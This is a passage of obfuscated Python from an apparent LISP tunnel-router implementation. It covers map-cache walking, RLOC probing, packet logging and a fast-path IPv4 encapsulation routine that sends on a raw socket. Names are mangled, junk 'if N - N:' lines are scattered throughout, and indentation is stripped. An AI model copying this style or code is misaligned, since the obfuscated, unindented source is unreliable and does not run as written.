if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
if 47 - 47: iII111i - Ii1I . II111iiii + OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
i1I1iI1iIi111i . delete_from_rloc_probe_list ( mc . eid , mc . group )
i1I1iI1iIi111i . store_translated_rloc ( Oo0OoO00oOO0o , i1I )
i1I1iI1iIi111i . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( oO00OOoO00 . format ( "RLOC" , o0OoOO000ooO0 ) )
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if 100 - 100: I1Ii111 * O0
if ( lisp . lisp_rloc_probing ) :
o00oO0oo0OO = None if ( mc . group . is_null ( ) ) else mc . eid
O0O0OOOOoo = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( o00O0OoO , 0 , o00oO0oo0OO , O0O0OOOOoo , i1I1iI1iIi111i )
if 74 - 74: I1ii11iIi11i + II111iiii / OoO0O00
if 100 - 100: OoOoOO00 * iIii1I11I1II1
if 86 - 86: OoO0O00 * OOooOOo . iII111i
if 32 - 32: o0oOOo0O0Ooo . IiII * I11i
if 93 - 93: o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
def ii1111iII ( mc , parms ) :
if 32 - 32: i1IIi / II111iiii . Oo0Ooo
if 62 - 62: OoooooooOO * I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if ( mc . group . is_null ( ) ) : return ( oo0o00O ( mc , parms ) )
if 97 - 97: O0 + OoOoOO00
if ( mc . source_cache == None ) : return ( True , parms )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( oo0o00O , parms )
return ( True , parms )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
def OooOo0ooo ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( ii1111iII ,
[ sockets , rloc , port , hostname ] )
return
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
if 11 - 11: I1ii11iIi11i . OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
def I1II1 ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 86 - 86: iIii1I11I1II1 / OoOoOO00 . II111iiii
if ( sred in [ "Send" , "Receive" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] ,
II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
II1i111Ii1i = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , II1i111Ii1i [ 0 : 8 ] , II1i111Ii1i [ 8 : 16 ] , II1i111Ii1i [ 16 : 24 ] , II1i111Ii1i [ 24 : 32 ] , II1i111Ii1i [ 32 : 40 ] ,
# I1IiiI
II1i111Ii1i [ 40 : 48 ] , II1i111Ii1i [ 48 : 56 ] , II1i111Ii1i [ 56 : 64 ] , II1i111Ii1i [ 64 : 72 ] ) )
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
def o0OOOoO0 ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 73 - 73: I11i % i11iIiiIii - I1IiiI
Ii1iI111II1I1 = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , Ii1iI111II1I1 ) )
if 91 - 91: OOooOOo % OOooOOo - I1IiiI
if 18 - 18: I11i - i11iIiiIii / II111iiii . OOooOOo
if 55 - 55: i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
if 23 - 23: I1Ii111 . IiII
def OO0000o ( ts , msg ) :
global I1I11I1I1I
if 42 - 42: Oo0Ooo
if ( I1I11I1I1I == False ) : return ( None )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if ( ts == None ) : return ( time . time ( ) )
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
if 69 - 69: IiII - O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / OoO0O00
if 79 - 79: O0 * i11iIiiIii - IiII / IiII
if 48 - 48: O0
def Oo0o0O00 ( a ) :
ii1 = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( ii1 )
if 39 - 39: Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * iII111i + I1IiiI
if 77 - 77: Ii1I + II111iiii . OoOoOO00 * I1Ii111 + OOooOOo + OOooOOo
if 9 - 9: I11i % OoooooooOO . oO0o % I11i
if 32 - 32: i11iIiiIii
if 31 - 31: iIii1I11I1II1 / OoO0O00 / I1ii11iIi11i
if 41 - 41: Oo0Ooo
if 10 - 10: Oo0Ooo / Oo0Ooo / I1Ii111 . I1Ii111
if 98 - 98: Oo0Ooo / I1IiiI . O0 + OoO0O00
if 43 - 43: II111iiii . oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 55 - 55: ooOoO0o - I11i + II111iiii + iII111i % Ii1I
if 41 - 41: i1IIi - I11i - Ii1I
if 8 - 8: OoO0O00 + I1Ii111 - o0oOOo0O0Ooo % Oo0Ooo % o0oOOo0O0Ooo * oO0o
if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
iI1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
IiI = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 21 - 21: OoO0O00 + I1IiiI % I1IiiI
def oO0o0oooO0oO ( packet ) :
global lisp_map_cache , o0oOoO00o
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
Iii1iiIi1II = OO0000o ( None , "Fast" )
if 60 - 60: I1IiiI - oO0o * I11i % II111iiii
if 62 - 62: iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
iii11I = 0
I1Iii1 = None
if ( packet [ 9 : 10 ] == b'\x11' ) :
if ( packet [ 20 : 22 ] == b'\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == b'\x10\xf6' ) : return ( False )
if 30 - 30: OoooooooOO - OoOoOO00
if ( packet [ 20 : 22 ] == b'\x10\xf5' or packet [ 22 : 24 ] == b'\x10\xf5' ) :
I1Iii1 = packet [ 12 : 16 ]
iii11I = packet [ 32 : 35 ]
iii11I = ord ( iii11I [ 0 ] ) << 16 | ord ( iii11I [ 1 ] ) << 8 | ord ( iii11I [ 2 ] )
if ( iii11I == 0xffffff ) : return ( False )
I1II1 ( "Decap" , packet )
packet = packet [ 36 : : ]
if 75 - 75: iIii1I11I1II1 - Ii1I . Oo0Ooo % i11iIiiIii % I11i
if 55 - 55: iII111i . II111iiii % OoO0O00 * iII111i + ooOoO0o + Ii1I
if 24 - 24: Oo0Ooo - oO0o % iIii1I11I1II1 . i1IIi / O0
I1II1 ( "Receive" , packet )
if 36 - 36: I1IiiI - I11i
if 29 - 29: ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
I1ii11 = Oo0o0O00 ( packet [ 16 : 20 ] )
IiI . instance_id = iii11I
IiI . address = I1ii11
if 74 - 74: Oo0Ooo - o0oOOo0O0Ooo . i1IIi
if 43 - 43: iII111i / I1IiiI
if 58 - 58: I1IiiI + i11iIiiIii % Ii1I . OoOoOO00
if 13 - 13: i11iIiiIii + i1IIi * iIii1I11I1II1 % OoooooooOO - II111iiii * OOooOOo
if ( ( I1ii11 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
if 26 - 26: OoooooooOO * I1IiiI + OOooOOo
if 24 - 24: i11iIiiIii % iIii1I11I1II1 + OOooOOo / i11iIiiIii
if 70 - 70: OoO0O00 * O0 . I11i + I1IiiI . IiII
if 14 - 14: iIii1I11I1II1 % iIii1I11I1II1 * i11iIiiIii - OoO0O00 - I11i
I1ii11 = IiI
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
if 27 - 27: O0
if ( I1Iii1 != None ) :
OOO0oOOoo = Oo0o0O00 ( packet [ 12 : 16 ] )
iI1 . instance_id = iii11I
iI1 . address = OOO0oOOoo
oOOO00o000o = lisp . lisp_map_cache . lookup_cache ( iI1 , False )
if ( oOOO00o000o == None ) :
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI1 , None ,
None )
if ( iIi11i1 ) : return ( False )
elif ( oOOO00o000o . gleaned ) :
I1Iii1 = Oo0o0O00 ( I1Iii1 )
if ( oOOO00o000o . rloc_set [ 0 ] . rloc . address != I1Iii1 ) : return ( False )
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
o00oo0 . add_recent_source ( iI1 )
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o00oo0 . action == lisp . LISP_NATIVE_FORWARD_ACTION and
o00oo0 . eid . instance_id == 0 ) :
I1ii11 . instance_id = lisp . lisp_default_secondary_iid
o00oo0 = lisp . lisp_map_cache . lookup_cache ( I1ii11 , False )
o0OOOoO0 ( I1ii11 , o00oo0 )
if ( o00oo0 == None ) : return ( False )
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if ( o00oo0 . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( o00oo0 . best_rloc_set == [ ] ) : return ( False )
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
I1ii11 = o00oo0 . best_rloc_set [ 0 ]
if ( I1ii11 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
if 45 - 45: I1Ii111
iii11I = o00oo0 . eid . instance_id
i1I = I1ii11 . translated_port
oO = I1ii11 . stats
I1ii11 = I1ii11 . rloc
IIi1iiii1iI = I1ii11 . address
I1Iii1 = lisp . lisp_myrlocs [ 0 ] . address
if 25 - 25: I1ii11iIi11i + O0
if 28 - 28: OoooooooOO
if 89 - 89: iII111i - ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 49 - 49: Oo0Ooo - I1IiiI / IiII / O0 % o0oOOo0O0Ooo * Ii1I
OOo = b'\x45\x00'
O0II11iI111i1 = len ( packet ) + 20 + 8 + 8
OOo += bytes ( [ ( O0II11iI111i1 >> 8 ) & 0xff , O0II11iI111i1 & 0xff ] )
OOo += b'\xff\xff\x40\x00\x10\x11\x00\x00'
OOo += bytes ( [ ( I1Iii1 >> 24 ) & 0xff , ( I1Iii1 >> 16 ) & 0xff ,
( I1Iii1 >> 8 ) & 0xff , I1Iii1 & 0xff ] )
OOo += bytes ( [ ( IIi1iiii1iI >> 24 ) & 0xff , ( IIi1iiii1iI >> 16 ) & 0xff ,
( IIi1iiii1iI >> 8 ) & 0xff , IIi1iiii1iI & 0xff ] )
OOo = lisp . lisp_ip_checksum ( OOo )
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
O0O0Ooooo000 = O0II11iI111i1 - 20
o000oOoo0o000 = b'\xff\x00' if ( i1I == 4341 ) else b'\x10\xf5'
o000oOoo0o000 += bytes ( [ ( i1I >> 8 ) & 0xff , i1I & 0xff ] )
o000oOoo0o000 += bytes ( [ ( O0O0Ooooo000 >> 8 ) & 0xff , O0O0Ooooo000 & 0xff ] ) + b'\x00\x00'
o000oOoo0o000 += b'\x08\xdf\xdf\xdf'
o000oOoo0o000 += bytes ( [ ( iii11I >> 16 ) & 0xff , ( iii11I >> 8 ) & 0xff , iii11I & 0xff ] )
o000oOoo0o000 += b'\x00'
if 40 - 40: i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - I11i . i1IIi
if 99 - 99: O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
packet = OOo + o000oOoo0o000 + packet
I1II1 ( "Encap" , packet )
else :
O0II11iI111i1 = len ( packet )
oO = o00oo0 . stats
I1II1 ( "Send" , packet )
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
o00oo0 . last_refresh_time = time . time ( )
oO . increment ( O0II11iI111i1 )
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
I1ii11 = I1ii11 . print_address_no_iid ( )
o0oOoO00o . sendto ( packet , ( I1ii11 , 0 ) )
if 27 - 27: Ii1I
OO0000o ( Iii1iiIi1II , "Fast" )
return ( True )
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
def ooO0o ( lisp_packet , thread_name ) :
global Oo0o , o000 , IiI1i
global o0oOoO00o , i1
global OOO0o0o
global iIiiI1
global oo0Ooo0
if 87 - 87: ooOoO0o
Iii1iiIi1II = OO0000o ( None , "RTR" )
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if ( oo0Ooo0 ) :
if ( oO0o0oooO0oO ( lisp_packet . packet ) ) : return
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
if 41 - 41: Ii1I
if 77 - 77: I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
iI11I = lisp_packet
I1IIIiii1 = iI11I . is_lisp_packet ( iI11I . packet )
if 65 - 65: I11i / II111iiii * Ii1I . iII111i * oO0o % OOooOOo
if 69 - 69: ooOoO0o - OoO0O00 / i11iIiiIii + I1ii11iIi11i % OoooooooOO
if 73 - 73: Ii1I - I1Ii111
if 68 - 68: iII111i * OoooooooOO * iIii1I11I1II1 . II111iiii
if ( I1IIIiii1 == False ) :
O0Oo = iI11I . packet
I1iii , oO0o0O0Ooo0o , i1I , i1Ii11II = lisp . lisp_is_rloc_probe ( O0Oo , - 1 )
if ( O0Oo != I1iii ) :
if ( oO0o0O0Ooo0o == None ) : return
lisp . lisp_parse_packet ( Oo0o , I1iii , oO0o0O0Ooo0o , i1I , i1Ii11II )
return
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
if 89 - 89: I1Ii111 + OoooooooOO + I1Ii111 * i1IIi + iIii1I11I1II1 % I11i
iI11I . packet = lisp . lisp_reassemble ( iI11I . packet )
if ( iI11I . packet == None ) : return
if 59 - 59: OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if ( lisp . lisp_flow_logging ) : iI11I = copy . deepcopy ( iI11I )
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
if 32 - 32: Ii1I . IiII . OoooooooOO - OoO0O00 + oO0o
if 88 - 88: iII111i
if 19 - 19: II111iiii * IiII + Ii1I
if ( I1IIIiii1 ) :
if ( iI11I . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
iI11I . print_packet ( "Receive-({})" . format ( thread_name ) , True )
iI11I . strip_outer_headers ( )
else :
if ( iI11I . decode ( False , None , None ) == None ) : return
iI11I . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if 65 - 65: OOooOOo . I1Ii111 . OoO0O00 . iII111i - OOooOOo
if 19 - 19: i11iIiiIii + iII111i % ooOoO0o
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if ( I1IIIiii1 and iI11I . lisp_header . get_instance_id ( ) == 0xffffff ) :
O0OO0oOOo = lisp . lisp_control_header ( )
O0OO0oOOo . decode ( iI11I . packet )
if ( O0OO0oOOo . is_info_request ( ) ) :
OO0oO0o = lisp . lisp_info ( )
OO0oO0o . decode ( iI11I . packet )
OO0oO0o . print_info ( )
if 39 - 39: o0oOOo0O0Ooo * ooOoO0o + Ii1I * II111iiii
if 97 - 97: iIii1I11I1II1 + I11i + II111iiii % IiII % I1Ii111 % oO0o
if 21 - 21: I1IiiI / ooOoO0o % ooOoO0o - o0oOOo0O0Ooo
if 70 - 70: Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
oooo00o0o0o = OO0oO0o . hostname if ( OO0oO0o . hostname != None ) else ""
O0Oo00oO0O00 = iI11I . outer_source
II1i111Ii1i = iI11I . udp_sport
if ( lisp . lisp_store_nat_info ( oooo00o0o0o , O0Oo00oO0O00 , II1i111Ii1i ) ) :
OooOo0ooo ( Oo0o , oooo00o0o0o , O0Oo00oO0O00 , II1i111Ii1i )
if 32 - 32: II111iiii . Ii1I - iII111i * I1Ii111
else :
oO0o0O0Ooo0o = iI11I . outer_source . print_address_no_iid ( )
i1Ii11II = iI11I . outer_ttl
iI11I = iI11I . packet
if ( lisp . lisp_is_rloc_probe_request ( iI11I [ 28 : 29 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( iI11I [ 28 : 29 ] ) == False ) :
i1Ii11II = - 1
if 71 - 71: o0oOOo0O0Ooo % Ii1I - II111iiii * OoooooooOO
iI11I = iI11I [ 28 : : ]
lisp . lisp_parse_packet ( Oo0o , iI11I , oO0o0O0Ooo0o , 0 , i1Ii11II )
if 69 - 69: o0oOOo0O0Ooo / Oo0Ooo
return
if 43 - 43: I1ii11iIi11i . I1IiiI / OoooooooOO % OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if 7 - 7: o0oOOo0O0Ooo + i1IIi . I1IiiI / Oo0Ooo
if 22 - 22: ooOoO0o - ooOoO0o % OOooOOo . I1Ii111 + oO0o
if 63 - 63: I1IiiI % I1Ii111 * o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % iII111i
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if 45 - 45: IiII
if 20 - 20: OoooooooOO * o0oOOo0O0Ooo * O0 . OOooOOo
if 78 - 78: iIii1I11I1II1 + I11i - Ii1I * I1Ii111 - OoooooooOO % OoOoOO00
if 34 - 34: O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if ( I1IIIiii1 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( iI11I . packet ) )
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
if 56 - 56: i11iIiiIii . o0oOOo0O0Ooo - I1IiiI * I11i
if 91 - 91: oO0o + OoooooooOO - i1IIi
o000OOooo0O = False
if ( iI11I . inner_dest . is_mac ( ) ) :
iI11I . packet = lisp . lisp_mac_input ( iI11I . packet )
if ( iI11I . packet == None ) : return
iI11I . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( iI11I . inner_version == 4 ) :
o000OOooo0O , iI11I . packet = lisp . lisp_ipv4_input ( iI11I . packet )
if ( iI11I . packet == None ) : return
iI11I . inner_ttl = iI11I . outer_ttl
elif ( iI11I . inner_version == 6 ) :
iI11I . packet = lisp . lisp_ipv6_input ( iI11I )
if ( iI11I . packet == None ) : return
iI11I . inner_ttl = iI11I . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if 34 - 34: OOooOOo
if 11 - 11: I1IiiI * oO0o + I1ii11iIi11i / I1ii11iIi11i
if 37 - 37: i11iIiiIii + i1IIi
if 23 - 23: iII111i + I11i . OoOoOO00 * I1IiiI + I1ii11iIi11i
if 18 - 18: IiII * o0oOOo0O0Ooo . IiII / O0
if ( iI11I . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( iI11I , ed = "decap" ) == False ) : return
iI11I . outer_source . afi = lisp . LISP_AFI_NONE
iI11I . outer_dest . afi = lisp . LISP_AFI_NONE
if 8 - 8: o0oOOo0O0Ooo
if 4 - 4: I1ii11iIi11i + I1ii11iIi11i * ooOoO0o - OoOoOO00
if 78 - 78: Ii1I / II111iiii % OoOoOO00
if 52 - 52: OOooOOo - iII111i * oO0o
if 17 - 17: OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
iIi11i1 , oO00oo0o00o0o , IiIIIIIi = lisp . lisp_allow_gleaning ( iI11I . inner_source , None ,
iI11I . outer_source )
if ( iIi11i1 ) :
iIIIi1i1I11i = iI11I . packet if ( o000OOooo0O ) else None
lisp . lisp_glean_map_cache ( iI11I . inner_source , iI11I . outer_source ,
iI11I . udp_sport , iIIIi1i1I11i )
if ( o000OOooo0O ) : return
if 55 - 55: Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
if 63 - 63: I1ii11iIi11i
O0O0OOOOoo = iI11I . inner_dest
if ( O0O0OOOOoo . is_multicast_address ( ) ) :
if ( O0O0OOOOoo . is_link_local_multicast ( ) ) :
i1II = lisp . green ( O0O0OOOOoo . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( i1II ) )
return
if 2 - 2: II111iiii - OoO0O00 . IiII * iII111i / oO0o
OOo0 = False
